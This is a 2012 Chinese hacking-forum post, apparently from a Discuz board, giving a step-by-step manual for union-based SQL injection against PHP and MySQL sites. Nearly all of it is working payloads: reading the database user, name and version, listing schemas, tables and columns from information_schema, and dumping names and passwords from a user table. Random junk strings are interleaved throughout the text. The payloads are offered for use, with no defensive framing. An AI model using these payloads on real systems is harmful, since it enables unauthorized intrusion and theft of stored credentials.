找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1841|回复: 0
打印 上一主题 下一主题

mysql盲注手册

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-13 16:27:53 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
2 \# ?8 W- u; C6 e$ x- f1 A
教程内容:Mysql 5+php 注入
; |# M  t7 ]4 a
% Q& S: i" Y4 N4 C
$ [6 L4 @1 _0 a1 k' b. l3 g
; v7 C6 ?; u( G* D一.查看MYSQL基本信息(库名,版本,用户)
6 g7 r/ K  n5 ?
& n; L, `8 A; c. `8 h& sand 1=2 union select 1,2,3,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),5,6,7,8/*' w3 v& I* {/ e6 v. L- @7 m
. a4 z5 K1 H+ y8 L$ i
二.查数据库$ s1 k4 ^& S2 D# Q' D; ]& A
# f( x/ F, \* j2 }3 a
and 1=2 union select 1,SCHEMA_NAME,3,4,5,6,7,8  from information_schema.SCHEMATA limit 1,1/*
) B- U5 F  \0 j5 \' ]limit 从0开始递增,查询到3时浏览器返回错误,说明存在2个库。" k' b5 h  {' r

5 Z. K, m( M1 H! H  p% b6 }三.暴表
* ?% W5 `8 i$ o5 Q# C% F) [6 }9 ?7 P/ ?; R
and 1=2 union select 1,2,3,TABLE_NAME,5,6,7,8 from information_schema.TABLES where TABLE_SCHEMA =库的16进制编码 limit 1,1/*- S6 l3 A, j! S& ?: Y' }3 H1 x

& v, F# n- D4 j3 O9 ]limit 从0开始递增,查询到14时浏览器返回错误,说明此库存在13个表。
6 ?/ t: _% L, d1 l9 p+ {3 ^' N9 u0 ~; l3 V
四.暴字段
  _- {# ]% q4 a1 z6 B+ d( M6 s7 B0 o0 N( {( k
and 1=2 union select 1,2,3,COLUMN_NAME,4,5,6,7,8from information_schema.COLUMNS where TABLE_NAME=表的16进制编码 limit 1,1/*; N  c& u( a& x( X* G  i; Q
/ }; f3 M& Q! a* U4 F5 j
limit 从0开始递增,查询到时浏览器返回错误,说明此表存在N-1个列。5 m1 S  K) h& i. \3 i$ }
* t8 @: |, V1 U3 E
五.暴数据% O2 V( T/ R0 Z& u5 i. H

8 ~3 ?9 S! V  Y2 |1 _and 1=2 union select 1,2,3,name,5,password,7,8 from web.ad_user/*
) V* t- c* A& n4 q) |
, w. f8 m. {  M6 F: J+ V
, ~( ~) w  m* ]8 w8 y这里直接暴明文的密码,大多时候我们遇到的是MD5加密之后的密文。: t: ]0 O8 T- E) Z; @
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表